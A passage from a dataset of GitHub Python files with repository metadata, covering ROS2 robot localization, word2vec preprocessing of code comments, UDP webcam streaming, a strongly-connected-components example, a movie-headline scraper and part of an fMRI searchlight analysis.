nbname in sys.argv[1:]:\n convert_nb(nbname)\n","repo_name":"yjgao-gfz/pyadjoint","sub_path":"pyadjoint/doc/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74371436008","text":"import math\nimport os\nimport pathlib\n\nfrom ament_index_python.packages import get_package_share_directory\n\nfrom cv_bridge import CvBridge\n\nimport rclpy\nfrom rclpy.node import Node\nfrom rclpy.qos import QoSProfile, QoSReliabilityPolicy, QoSHistoryPolicy,QoSDurabilityPolicy\nimport numpy as np\n\nfrom nav_msgs.msg import OccupancyGrid\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Pose, PoseWithCovarianceStamped\nfrom vqa_msgs.msg import VisualFeatures\n\n\nfrom scipy import ndimage, signal\n\nfrom tf2_ros import TransformBroadcaster, TransformException\nfrom tf2_ros.buffer import Buffer\nfrom tf2_ros.transform_listener import TransformListener\nfrom tf2_ros.static_transform_broadcaster import StaticTransformBroadcaster\n\nfrom message_filters import ApproximateTimeSynchronizer, Subscriber, Cache\nfrom topological_mapping.topological_mapping.topological_map import TopologicalMap\nfrom geometry_msgs.msg import TransformStamped\n\n\nclass TopologicalLocalization(Node):\n def __init__(self):\n super().__init__('topological_localization')\n\n map_qos_profile = QoSProfile(\n reliability=QoSReliabilityPolicy.RELIABLE,\n history=QoSHistoryPolicy.KEEP_LAST,\n durability=QoSDurabilityPolicy.TRANSIENT_LOCAL,\n depth=1\n )\n\n # parameters\n self.declare_parameter('map_resolution', 0.050)\n self.declare_parameter('kernel_scale', 8.0)\n self.declare_parameter('question_qty', 10)\n self.declare_parameter('state_qty', 8)\n self.declare_parameter('max_images_per_state', 10)\n \n # it is the number the map(gridmap) shape will be divided by:\n self.kernel_scale = self.get_parameter('kernel_scale').get_parameter_value().double_value\n self.state_qty = self.get_parameter('state_qty').get_parameter_value().integer_value\n self.question_qty = self.get_parameter('question_qty').get_parameter_value().integer_value\n self.question_depth = self.get_parameter(\n 'max_images_per_state').get_parameter_value().integer_value\n # m/pix\n self.map_resolution = self.get_parameter(\n 'map_resolution').get_parameter_value().double_value\n\n self.__pkg_folder = str(pathlib.Path(__file__).parent.resolve()).removesuffix(\n '/topological_localization')\n self.map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map4.npy')\n self.image_map_folder = os.path.join(get_package_share_directory('topological_mapping'),\n 'map3.jpg')\n\n self.vqa_features = None\n self.image_converter = CvBridge()\n self.tf_static_broadcaster = StaticTransformBroadcaster(self)\n self.tf_broadcaster = TransformBroadcaster(self)\n self.tf_buffer = Buffer()\n self.tf_listener = TransformListener(self.tf_buffer, self)\n self.map_helper = None\n self.odom_pose = None\n self.visualizer = None\n # init prediction variables\n self.odom_pose = Odometry().pose\n self.odom_pose.pose.position.x = 0.0\n self.odom_pose.pose.position.y = 0.0\n self.d_increment = self.angle_increment = 0.0\n self.odom_list = []\n # 1.76 s convolution + 4 s perception \n self.timer = self.create_timer(8.0, self.control_cycle)\n # publishers \n self.pose_publisher = self.create_publisher(PoseWithCovarianceStamped, '/markov_pose', 1)\n self.grid_publisher = self.create_publisher(OccupancyGrid,\n '/motion_update/localization_grid',\n 1)\n # subscribers\n self.create_subscription(OccupancyGrid,\n '/map',\n self.map_callback,\n qos_profile=map_qos_profile) \n \n self.tss = ApproximateTimeSynchronizer([Subscriber(self, Odometry, 'odom'),\n Subscriber(self, VisualFeatures, 'features')],\n 10,\n 6)\n self.tss.registerCallback(self.feature_callback)\n\n self.broadcast_map()\n\n def control_cycle(self):\n\n\n self.odom_list.append(self.odom_pose)\n if len(self.odom_list) > 2:\n self.odom_list.pop(0)\n\n if len(self.odom_list) < 2 or self.vqa_features is None:\n return\n self.get_logger().debug('executing algorithm')\n\n self.d_increment, self.angle_increment = self._calculate_increment(self.odom_list)\n self.localization_algorithm()\n # image = self.grid_to_img()\n # msg = self.img_to_occupancy(image)\n\n # self.grid_publisher.publish(msg)\n\n def map_callback(self, msg):\n\n self.map_helper = TopologicalMap(msg,\n self.state_qty,\n self.question_qty,\n self.question_depth)\n\n self.get_logger().info('loading topological map .. ')\n self.get_logger().info('map folder path ' + self.map_folder)\n self.map_helper.load_map(self.map_folder)\n self.init_localization_grid()\n\n\n def grid_to_img(self):\n\n return (self._localization_grid[:, :, 0] * 255).round().astype(np.uint8)\n\n\n def broadcast_map(self):\n\n t = TransformStamped()\n\n t.header.stamp = self.get_clock().now().to_msg()\n t.header.frame_id = 'world'\n t.child_frame_id = 'map'\n\n t.transform.translation.x = 0.0\n t.transform.translation.y = 0.0\n t.transform.translation.z = 0.0\n\n t.transform.rotation.x = 0.0\n t.transform.rotation.y = 0.0\n t.transform.rotation.z = 0.0\n t.transform.rotation.w = 1.0\n\n self.tf_static_broadcaster.sendTransform(t)\n\n def img_to_occupancy(self, image):\n\n if self.map_helper is None:\n return\n\n image = image * 100\n\n map = self.map_helper.occupancy_map\n data = np.array(image.flatten(), dtype=np.int8)\n\n map.data = data.tolist()\n\n return map\n\n\n def feature_callback(self, odom_msg, vqa_msg):\n\n if self.map_helper is None:\n return\n \n self.vqa_features = vqa_msg\n self.odom_pose = odom_msg.pose\n\n return True\n\n def init_localization_grid(self):\n\n self._localization_grid = np.full(\n shape=(self.map_helper.occupancy_map.info.height,\n self.map_helper.occupancy_map.info.width,\n self.state_qty+1),\n fill_value=1/((self.state_qty+1)*self.map_helper.occupancy_map.info.height*\n self.map_helper.occupancy_map.info.width))\n\n # 116,192 center coordinates\n # self._localization_grid[105:125,180:200,0] = 0.45\n self.get_logger().info(\"grid initialized\")\n\n return True\n\n def convolve_1d(self, kernel_1d):\n \n _ = np.apply_along_axis(lambda m: np.convolve(m, kernel_1d, mode=\"same\"), axis=-1, arr=self._localization_grid[:,:,1:])\n self._localization_grid[:,:,1:] = _\n\n return True\n \n def _calculate_1d_kernel_size(self):\n\n size = int(np.round(self.state_qty / self.kernel_scale))\n \n return size\n\n def _calculate_1d_kernel_center(self,odom_pose,kernel_shape,is_centered=False):\n\n kernel_resolution = 2*np.pi / kernel_shape #rad/div\n angle = self.map_helper._quaternion_to_euler(odom_pose.pose.orientation)[-1]\n if angle < 0:\n angle = angle + 2*np.pi\n elif angle > 2 * np.pi:\n angle = 2 * np.pi\n if is_centered:\n center = int(np.round(kernel_shape/2))\n else: \n center = int(np.round(angle/kernel_resolution))\n\n return center\n \n def _calculate_2d_kernel_size(self):\n\n height = int(self.map_helper.occupancy_map.info.height / self.kernel_scale)\n width = int(self.map_helper.occupancy_map.info.width / self.kernel_scale) \n \n return (height, width)\n\n def _calculate_2d_kernel_center(self, odom_pose, kernel_shape, is_centered=False):\n\n kernel_resolution = ((self.map_helper.occupancy_map.info.height * self.map_resolution / kernel_shape[0]) +\n (self.map_helper.occupancy_map.info.width * self.map_resolution / kernel_shape[1]))/2\n \n\n if is_centered: \n h = int(kernel_shape[0]/2)\n w = int(kernel_shape[1]/2)\n else: \n h = int(round((odom_pose.pose.position.y - self.map_helper.occupancy_map.info.origin.position.y ) / kernel_resolution))\n w = int(round((odom_pose.pose.position.x - self.map_helper.occupancy_map.info.origin.position.x ) / kernel_resolution))\n \n return (h, w)\n\n def _calculate_sigma(self):\n return\n\n def _1d_gaussian_kernel(self, k_size=5, sigma=1.0, center=2):\n\n x = np.arange(k_size)\n \n kernel = (1 / (np.sqrt(2 * np.pi) * sigma)) * np.exp(-((x - center) ** 2 / (2 * sigma ** 2)))\n \n kernel = kernel / np.sum(kernel) \n\n return kernel\n \n def _2d_gaussian_kernel(self, k_size=(10, 10), sig=[1, 1], center=(2, 2)):\n # Define the kernel size\n n_h, n_w = k_size\n\n # Define the standard deviation of the Gaussian distribution for each axis\n sigma_h, sigma_w = sig\n\n # Define the center of the kernel\n center_h, center_w = center\n\n # Create 2D coordinate arrays for the kernel using np.mgrid\n y, x = np.mgrid[:n_h, :n_w]\n\n # Calculate the values of the Gaussian distribution at each element of the kernel\n kernel = (1 / (np.sqrt(2 * np.pi) * sigma_h * sigma_w)) * np.exp(-(((x - center_w) ** 2 / (2 * sigma_w ** 2)) + ((y - center_h) ** 2 / (2 * sigma_h ** 2))))\n\n # Normalize the kernel so that the values sum to 1\n kernel = kernel / np.sum(kernel)\n\n return kernel\n\n def motion_update(self, delta_distance, delta_theta):\n\n self.get_logger().debug(f'delta distance{delta_distance}') \n if delta_distance <= 0.1:\n centered_2d = True\n else:\n centered_2d = False\n if delta_theta <= 0.0872665:\n centered_1d = True\n else:\n centered_1d = False\n\n kernel_shape_2d = self._calculate_2d_kernel_size()\n kernel_shape_1d = self._calculate_1d_kernel_size()\n\n center_2d = self._calculate_2d_kernel_center(self.odom_pose, kernel_shape_2d, is_centered=centered_2d)\n center_1d = self._calculate_1d_kernel_center(self.odom_pose, kernel_shape_1d, is_centered=centered_1d)\n\n gauss_kernel_2d = self._2d_gaussian_kernel(kernel_shape_2d, center=center_2d)\n gauss_kernel_1d = self._1d_gaussian_kernel(kernel_shape_1d, center=center_1d)\n\n self._localization_grid[:, :, 0] = signal.fftconvolve(self._localization_grid[:, :, 0], gauss_kernel_2d, mode='same')\n self.convolve_1d(gauss_kernel_1d)\n self.get_logger().debug(f\"center 2d {center_2d}\")\n\n return True\n\n def normalize_grid(self):\n\n self._localization_grid = self._localization_grid / self._localization_grid.max()\n \n def perception_update(self):\n\n # question_answers_indexes = []\n # question_answers_accs = []\n\n # for i in range(len(self.vqa_features.data)):\n\n # # 'refrigerator' \n # ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # # we keep only coincidences in the current question \n # ind = ind[0][np.where(ind[1] == i)]\n \n # # we keep the topological indexes where there is a coincidence :\n # current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n # current_question_acc = []\n \n # # we extract the accuracy for each one of them (acc of question times acc of map) \n # for index in np.unique(ind):\n # acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n # acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n # current_question_acc.append(acc)\n\n # question_answers_indexes.extend(current_question_indexes.tolist())\n # question_answers_accs.extend(current_question_acc)\n\n \n # current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # # there are repeated indexes\n # unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n\n\n\n # # Iterate over the unique elements\n # for i in unique_elements:\n\n # indices = np.where(current_map_raw[:, 0] == i)\n # values = current_map_raw[indices][:, 1]\n # product = np.prod(values)\n \n # col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # self._localization_grid[row,col,0] *= (1/product)\n # self._localization_grid[row,col,state] *= (1/product) \n\n question_answers_indexes = []\n question_answers_accs = []\n\n for i in range(len(self.vqa_features.data)):\n\n ind = np.where(self.map_helper.topological_map['q_a'] == self.vqa_features.data[i])\n # we keep only coincidences in the current question \n ind = ind[0][np.where(ind[1] == i)]\n \n # we keep the topological indexes where there is a coincidence :\n current_question_indexes = self.map_helper.topological_map['index'][np.unique(ind)] \n current_question_acc = []\n \n # we extract the accuracy for each one of them (acc of question times acc of map) \n for index in np.unique(ind):\n acc_ind = np.where(self.map_helper.topological_map['q_a'][index][i] == self.vqa_features.data[i]) \n acc = acc_ind[0].size / np.nonzero(self.map_helper.topological_map['q_a'][index][i])[0].size \n current_question_acc.append(acc)\n\n question_answers_indexes.extend(current_question_indexes.tolist())\n question_answers_accs.extend(current_question_acc)\n \n current_map_raw = np.transpose(np.array([question_answers_indexes,question_answers_accs]))\n \n # there are repeated indexes\n unique_elements, counts = np.unique(current_map_raw[:, 0], return_counts=True)\n\n # Iterate over the unique elements\n for i in unique_elements:\n\n indices = np.where(current_map_raw[:, 0] == i)\n values = current_map_raw[indices][:, 1]\n product = np.prod(values)\n \n col,row,state = self.map_helper.topological_index_to_occupancy_x_y(int(i))\n # change to sum\n self._localization_grid[row,col,0] += (1/product)\n self._localization_grid[row,col,state] += (1/product) \n\n self.normalize_grid()\n\n return True\n \n\n def publish_pose(self,covariance=1.0):\n \n ind = np.unravel_index(np.argmax(self._localization_grid, axis=None), self._localization_grid.shape)\n x, y = self.map_helper._get_world_x_y(ind[1], ind[0])\n theta = self.map_helper._undiscretize_angle(ind[2])\n \n msg = PoseWithCovarianceStamped()\n msg.header.frame_id = 'map'\n msg.header.stamp = self.get_clock().now().to_msg()\n\n msg.pose.pose.position.x = x\n msg.pose.pose.position.y = y\n msg.pose.pose.position.z = 0.0\n\n q = self.map_helper._quaternion_from_euler(0.0, 0.0, theta)\n msg.pose.pose.orientation.x = q[0]\n msg.pose.pose.orientation.y = q[1]\n msg.pose.pose.orientation.z = q[2]\n msg.pose.pose.orientation.w = q[3]\n\n self.pose_publisher.publish(msg)\n \n return True\n\n def _calculate_increment(self,msg_buffer):\n\n initial_distance = math.sqrt(msg_buffer[0].pose.position.x ** 2 + \n msg_buffer[0].pose.position.y ** 2 +\n msg_buffer[0].pose.position.z ** 2)\n\n current_distance = math.sqrt(msg_buffer[1].pose.position.x ** 2 + \n msg_buffer[1].pose.position.y ** 2 +\n msg_buffer[1].pose.position.z ** 2)\n\n initial_angle = self.map_helper._quaternion_to_euler(msg_buffer[0].pose.orientation)[-1]\n current_angle = self.map_helper._quaternion_to_euler(msg_buffer[1].pose.orientation)[-1]\n \n distance_increment = abs(current_distance - initial_distance)\n angle_increment = abs(current_angle - initial_angle)\n\n return distance_increment, angle_increment\n\n def localization_algorithm(self):\n\n self.perception_update()\n self.motion_update(self.d_increment, self.angle_increment)\n\n self.publish_pose()\n\n\ndef main(args=None):\n rclpy.init(args=args)\n\n topo_node = TopologicalLocalization()\n\n rclpy.spin(topo_node)\n\n\n topo_node.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"juandpenan/topology_nav_ros2","sub_path":"topological_localization/topological_localization/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41738315662","text":"import gzip\nimport multiprocessing\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom math import floor\nfrom os import listdir, makedirs, path\nfrom shutil import copyfile\n\nimport numpy as np\nimport pandas as pd\nimport spacy\nfrom gensim.models import Word2Vec\nfrom spacy_langdetect import LanguageDetector\nfrom yaspin import yaspin\n\nfrom visualize_embeddings import tsne_plot\n\nORTH = spacy.symbols.ORTH\n\n\ndef round_down(num):\n i = str(num)\n divisor_max = 2 if num < 1000 else 3\n divisor_idx = min(len(i), divisor_max)\n\n divisor = \"\".join(i[:divisor_idx])\n\n for i in range(len(divisor), len(i)):\n divisor = divisor + \"0\"\n\n divisor = int(divisor)\n\n return floor(num / divisor) * divisor\n\n\ndef splitForwardSlashes(match):\n slashes = list(match.group(0))\n return \" \".join(slashes)\n\n\ndef clean_token(text):\n # normalize\n text = text.lower()\n\n # replace URLs\n text = re.sub(r\"(https|http)?:\\/\\/(\\w|\\.|\\/|\\?|\\=|\\&|\\%)*\\b\", \"URL\", text)\n\n # custom splitting rule to create space around special code characters\n text = re.sub(r\"([.,()<>\\[\\]{}\\\"\\'`\\-$=_;%|&#~^\\\\])\", r\" \\1 \", text)\n\n # replace multiple forward slashes\n text = re.sub(r\"\\/{3,}\", lambda m: splitForwardSlashes(m), text)\n\n # replace tab stops\n text = re.sub(r\"\\t\", \"\", text)\n\n # replace newlines with a special \"end-of-sequence\" token\n text = re.sub(r\"\\r\\n|\\r|\\n\", \" \", text)\n\n return text\n\n\ndef clean_document(doc):\n \"\"\" Clean up comments. Tokenize, lowercase, and remove characters that are not allowed \"\"\"\n\n # filter out English comments\n isEnglish = lambda doc: doc._.language[\"language\"] == \"en\"\n\n if not isEnglish(doc):\n return nlp.make_doc(\"\")\n\n # clean each token in document\n text = [token for token in (clean_token(tok.text) for tok in doc) if token != \"\"]\n\n text = \" \".join(text)\n\n # adding a start and an end token to the sentence so that\n # the model know when to start and stop predicting\n text = \" \" + text + \" \"\n\n # replace multiple whitespaces with a single whitespace\n text = re.sub(r\" {2,}\", \" \", text)\n\n return nlp.make_doc(text)\n\n\nnlp = spacy.load(\"en_core_web_sm\")\n\n# add special cases for the tokenizer\nnlp.tokenizer.add_special_case(\"/**\", [{ORTH: \"/**\"}])\nnlp.tokenizer.add_special_case(\"/*\", [{ORTH: \"/*\"}])\nnlp.tokenizer.add_special_case(\"*/\", [{ORTH: \"*/\"}])\nnlp.tokenizer.add_special_case(\"//\", [{ORTH: \"//\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\nnlp.tokenizer.add_special_case(\"\", [{ORTH: \"\"}])\n\nnlp.add_pipe(clean_document, name=\"cleaner\", last=True)\nnlp.add_pipe(LanguageDetector(), name=\"language_detector\", before=\"cleaner\")\n\nboolean = lambda x: (str(x).lower() == \"true\")\n\nparser = ArgumentParser()\n\nparser.add_argument(\n \"-v\", \"--visualize\", nargs=\"?\", type=boolean, const=True, default=False\n)\n\nparser.add_argument(\n \"-s\", \"--save-dataset\", nargs=\"?\", type=boolean, const=True, default=True\n)\n\nparser.add_argument(\"-t\", \"--train\", nargs=\"?\", type=boolean, const=True, default=False)\n\nparser.add_argument(\n \"-d\", \"--dataset\", nargs=\"?\", type=str, const=True, default=\"dataset.json\"\n)\n\nargs = parser.parse_args()\n\nsaveDataset = args.save_dataset\nvisualize = args.visualize\ntrain = args.train\n\ndata_dir = \"../data\"\nmetadata_filename = \"metadata.txt\"\nmetadata_path = path.join(data_dir, metadata_filename)\ndataset_path = path.join(data_dir, args.dataset)\nfilename_dataset_clean = \"dataset_clean.csv\"\n\nif not path.exists(dataset_path):\n sys.exit(\n \"Error: Couldn't find '{}'. Make sure to generate a dataset first.\".format(\n path.basename(dataset_path)\n )\n )\n\nout_dir = \"../runs\"\n\n# create output dir\nif not path.exists(out_dir):\n makedirs(out_dir)\n\ndf = pd.read_json(dataset_path, lines=True)\n\n# create run dir\nrun_dir = \"\"\n\n# --- Hyper-Parameters ---\n\n# more dimensions mean more computationally expensive,\n# but also more accurate. 300 is a decent compromise\nnum_features = 300\n\n# minimum count of words to consider when training the model\nmin_word_count = 3\n\n# run training in parallel, more workers = faster training\nnum_workers = multiprocessing.cpu_count()\n\n# size of the sliding window (number of words around the target window)\nwindow_size = 7\n\n# determines how often do we want to look at the same word\ndownsampling = 1e-3\n\n# used to pick what part of the text we look at\nseed = 1\n\n# default is 5, we keep the default because increasing the number\n# of epochs dramatically increases the training time, but also gives\n# better results.\nepochs = 5\n\n# ------------------------\n\n\n@yaspin(text=\"Cleaning comments...\")\ndef clean_comments(comments):\n comments = comments.apply(lambda c: nlp(c))\n comments = comments.apply(lambda doc: doc if doc.text != \"\" else np.nan)\n return comments\n\n\n@yaspin(text=\"Dumping dataset...\")\ndef dump_dataset(df):\n df.to_csv(path.join(run_dir, filename_dataset_clean), header=True)\n\n\n@yaspin(text=\"Training Word2vec...\")\ndef train_word2vec(\n sentences,\n sg=1,\n size=num_features,\n min_count=min_word_count,\n seed=seed,\n window=window_size,\n sample=downsampling,\n iter=epochs,\n):\n model = Word2Vec(\n sentences,\n sg=sg,\n size=size,\n min_count=min_count,\n seed=seed,\n window=window,\n workers=num_workers,\n sample=sample,\n iter=iter,\n )\n\n return model\n\n\n@yaspin(text=\"Saving model...\")\ndef save_model(model, filename):\n model_path = path.join(run_dir, filename)\n model.save(model_path)\n\n\n@yaspin(text=\"Plotting word embeddings...\")\ndef plot_embeddings(model, df, filename):\n tsne_plot(model, df, filename)\n\ndf[\"comments_orig\"] = df[\"comments\"]\ndf[\"comments\"] = clean_comments(df[\"comments\"])\n\n# remove corrupted rows (mostly comments that are written in languages other than English)\ndf = df.dropna()\n\nn_observations = df.shape[0]\nn_observations_r = round_down(n_observations)\n\nrun_dir = path.join(out_dir, str(n_observations_r))\n\nif not path.exists(run_dir):\n makedirs(run_dir)\n\nprint(\"Observations: {}\".format(n_observations))\n\ncomments = df[\"comments\"].map(lambda doc: [token.text for token in doc])\n\nif train:\n model_comments = train_word2vec(comments)\n save_model(model_comments, \"word2vec_comments.model\")\n print(\"Size Vocabulary (Comments):\", len(model_comments.wv.vocab))\n\n if visualize:\n plot_embeddings(model_comments, df, path.join(run_dir, \"word2vec_comments.png\"))\n\nasts = df[\"ast\"]\nasts = asts.map(lambda ast: [token for token in ast.split(\" \")])\n\nif train:\n model_asts = train_word2vec(asts, min_count=1)\n save_model(model_asts, \"word2vec_asts.model\")\n print(\"Size Vocabulary (ASTs):\", len(model_asts.wv.vocab))\n\n if visualize:\n plot_embeddings(model_asts, df, path.join(run_dir, \"word2vec_asts.png\"))\n\ndataset_clean = df[[\"ast\", \"comments\", \"comments_orig\"]]\n\nif saveDataset:\n dump_dataset(dataset_clean)\n\nprint(\"Copying metadata\")\ncopyfile(metadata_path, path.join(run_dir, metadata_filename))\n\nprint(\"Done!\")\n","repo_name":"urish/ml-comments-gen","sub_path":"model/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":7090,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"71504760489","text":"import time\n\nimport cv2,socket,pickle,os\nimport numpy as np\nimport threading\n\nclass VideoStream:\n def __init__(self):\n self.cap = None\n self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1000000)\n self.user_sockets = []\n self.current_thread = None\n self.is_streaming = False\n\n def add_user(self, u_ip: str, u_port: int):\n self.user_sockets.append((u_ip, u_port))\n\n def remove_user(self, u_ip: str, u_port: int):\n t = (u_ip, u_port)\n self.user_sockets.remove(t)\n self.stop_streaming()\n\n def video_streaming(self):\n print(\"Streaming!\")\n self.is_streaming = True\n # self.cap = cv2.VideoCapture(0, cv2.CAP_DSHOW)\n self.cap = cv2.VideoCapture(0)\n while self.is_streaming:\n ret, photo = self.cap.read()\n\n if photo is None:\n continue\n ret, buffer = cv2.imencode(\".jpg\", photo, [int(cv2.IMWRITE_JPEG_QUALITY), 30])\n x_as_bytes = pickle.dumps(buffer)\n for u_ip, u_port in self.user_sockets:\n self.s.sendto((x_as_bytes), (u_ip, u_port))\n\n def start_stream(self, u_ip: str, u_port: int):\n if not self.user_sockets:\n self.current_thread = threading.Thread(target=self.video_streaming)\n self.current_thread.start()\n\n self.add_user(u_ip, u_port)\n\n def stop_streaming(self, force=False):\n time.sleep(0.1)\n if force or not self.user_sockets:\n self.is_streaming = False\n self.cap.release()\n print(\"stopped streaming from class\")\n\n\n\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/VideoStreaming/VideoStream.py","file_name":"VideoStream.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27685599634","text":"###################################\r\n#\t\t\t\t\t\t\t\t #\r\n#\t\tAuthor : Dhananjay\t\t #\r\n#\t\t\t\t IIT Gandhinagar #\r\n#\t\t\t\t\t\t\t\t #\r\n###################################\r\n\r\n# Finding strongly connected components(SSC) in directed graph\r\n# Extension of dfs \t\t\t\t\t - \t\tO(V+E)\r\n\r\nfrom collections import defaultdict\r\nUNVISITED = 0\r\nEXPLORED = 1\r\nVISITED = 2\r\n\r\ndef SSC(u):\r\n\tglobal dfsNumber, sscNumber\r\n\tdfs_low[u] = dfs_num[u] = dfsNumber\r\n\tdfsNumber += 1\r\n\tvisited[u] = VISITED\r\n\tstc.append(u)\r\n\t\r\n\tfor v,w in AdjList[u]:\r\n\t\tif dfs_num[v] == UNVISITED:\r\n\t\t\tSSC(v)\r\n\t\tif visited[v]:\r\n\t\t\tdfs_low[u] = min(dfs_low[u], dfs_low[v])\r\n\t\r\n\tif dfs_low[u] == dfs_num[u]:\r\n\t\tsscNumber += 1 \r\n\t\tprint(\"SSC\", sscNumber,\":\", end = \" \")\r\n\t\twhile True:\r\n\t\t\tv = stc.pop()\r\n\t\t\tvisited[v] = UNVISITED\r\n\t\t\tprint(v, end = \" \")\r\n\t\t\tif u == v:\r\n\t\t\t\tbreak\r\n\t\tprint()\r\n\r\n\r\nAdjList = defaultdict(list)\r\n# Graph for which we will create AdjList.\r\n#\r\n# 7 5 9 1\r\n#\t0 ------> 1 ---> 2 ------> 4 ---> 5\r\n#\t\t ^ /\t\t ^ |\r\n#\t\t 8| / 5\t 5|\t | 3\r\n#\t\t | /\t\t |\t |\r\n# |v \t | 3 v \r\n# 3 \t 6 <--- 7\r\nAdjList = {0 : [[1,7]],\r\n\t\t 1 : [[2,5]],\r\n\t\t 2 : [[3,5],[4,9]],\r\n\t\t 3 : [[1,8]],\r\n\t\t 4 : [[5,1]],\r\n\t\t 5 : [[7,3]],\r\n\t\t 6 : [[4,5]],\r\n\t\t 7 : [[6,3]]}\r\nV = len(AdjList)\r\ndfs_num = [UNVISITED]*V\r\ndfs_low = [UNVISITED]*V\r\nvisited = [UNVISITED]*V\r\nstc = []\r\ndfsNumber = 0\r\nsscNumber = 0\r\n\r\nfor i in range(V):\r\n\tif dfs_num[i] == UNVISITED:\r\n\t\tSSC(i)\r\n","repo_name":"dhananjay1210/Data-Structures","sub_path":"graph/8.graph_SSC.py","file_name":"8.graph_SSC.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30257054138","text":"import requests\nfrom bs4 import BeautifulSoup\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\ndef get_pages(idx):\n url = \"https://editorial.rottentomatoes.com/publications\"\n response = requests.get(url, params = {'wpv_view_count': '52769-TCPID52767', 'wpv_paged': idx}, headers = headers)\n html = response.text\n soup = BeautifulSoup(html, \"html.parser\")\n\n headlines = soup.select('a.article_headline')\n publishers = soup.select('a.unstyled.bold')\n date = soup.select('.subtle.small')\n\n output_hl = []\n output_pub = []\n output_date = []\n\n # for title in headlines:\n # output.append(title.text.strip())\n\n # print(len(headlines))\n # print(len(publishers))\n # print(len(date))\n\n for i in range(0, len(headlines)):\n output_hl.append(headlines[i].text.strip())\n output_pub.append(publishers[i].text.strip())\n output_date.append(date[i].text.strip())\n\n return output_hl, output_pub, output_date\n\nfor j in range(1,100):\n result_hl, result_pub, result_date = get_pages(j)\n for i in range(0,len(result_hl)):\n print(result_hl[i])\n print(result_pub[i])\n print(result_date[i])\n","repo_name":"pondjames007/DetourningTheWeb","sub_path":"hw2_grabLongList/hw2.py","file_name":"hw2.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25292683241","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport nibabel as nib\n\nfrom fg_config import *\nfrom bids_model import bids_events\n\nfrom nilearn.input_data import NiftiMasker\nfrom nilearn.image import new_img_like\nfrom collections import OrderedDict\nfrom scipy.stats import ttest_1samp, ttest_ind, wilcoxon\n\nconditions = {'CS+': 'CSp',\n 'CS-': 'CSm'}\nphases = ['acquisition','extinction']\n\nmasker = NiftiMasker(mask_img=std_2009_brain_mask_3mm)\nmasker.fit()\n\n\ndef sub_imgs():\n\n std = nib.load(std_2009_brain_mask_3mm)\n for sub in all_sub_args:\n print(sub)\n subj = bids_meta(sub)\n out = f'{subj.rsa}/ers_sl_imgs'\n mkdir(out)\n\n with open(os.path.join(subj.rsa,'sl_er.p'),'rb') as file:\n mat = pickle.load(file)\n mat = new_img_like(std_2009_brain_3mm,mat)#need this for the inverse to work\n mat = masker.transform(mat)\n\n df = pd.read_csv(os.path.join(subj.rsa,'fs_mask_roi_ER.csv'))\n df = df[df.roi == 'sgACC'].reset_index(\n ).rename(columns={'index':'trial_num'}\n ).drop(columns=['roi','rsa']\n ).set_index(['encode_phase','trial_type']\n ).sort_index(\n ).dropna(subset=['response'])#sets us up to use .loc for stability\n\n for phase in phases:\n for con in conditions:\n est = mat[df.loc[(phase,con),'trial_num'].values,:].mean(axis=0)\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_{conditions[con]}.nii.gz')\n\n #lets also do the subtraction i guess\n for phase in phases:\n csp = mat[df.loc[(phase,'CS+'),'trial_num'].values,:].mean(axis=0)\n csm = mat[df.loc[(phase,'CS-'),'trial_num'].values,:].mean(axis=0)\n est = csp - csm\n est = new_img_like(std,masker.inverse_transform(est).get_fdata(),copy_header=True)#need this for the header\n nib.save(est,f'{out}/{phase}_diff.nii.gz')\n\ndef one_samp_ttest(subs=None,phase=None,name=''):\n out_parent = '/scratch/05426/ach3377/searchlight/ers_comps'\n out_dir = f'/scratch/05426/ach3377/searchlight/ers_comps/{name}_{phase}'\n mkdir(out_dir)\n \n setA = ''\n for s, sub in enumerate(subs):\n setA += f'{bids_meta(sub).rsa}/ers_sl_imgs/{phase}_diff.nii.gz '\n \n n_cors = 'export OMP_NUM_THREADS=48'\n cd_cmd = f'cd {out_dir}'\n clustsim_cmd = f'3dttest++ -setA {setA} \\\n -Clustsim 48 \\\n -mask {gm_3mm_thr} \\\n -prefix {name}_{phase}_clst-ttest'\n \n script = f'{out_dir}/ttest_script.txt'\n os.system(f'rm {script}')\n \n for cmd in [n_cors, cd_cmd, clustsim_cmd]:\n os.system(f\"echo {cmd} >> 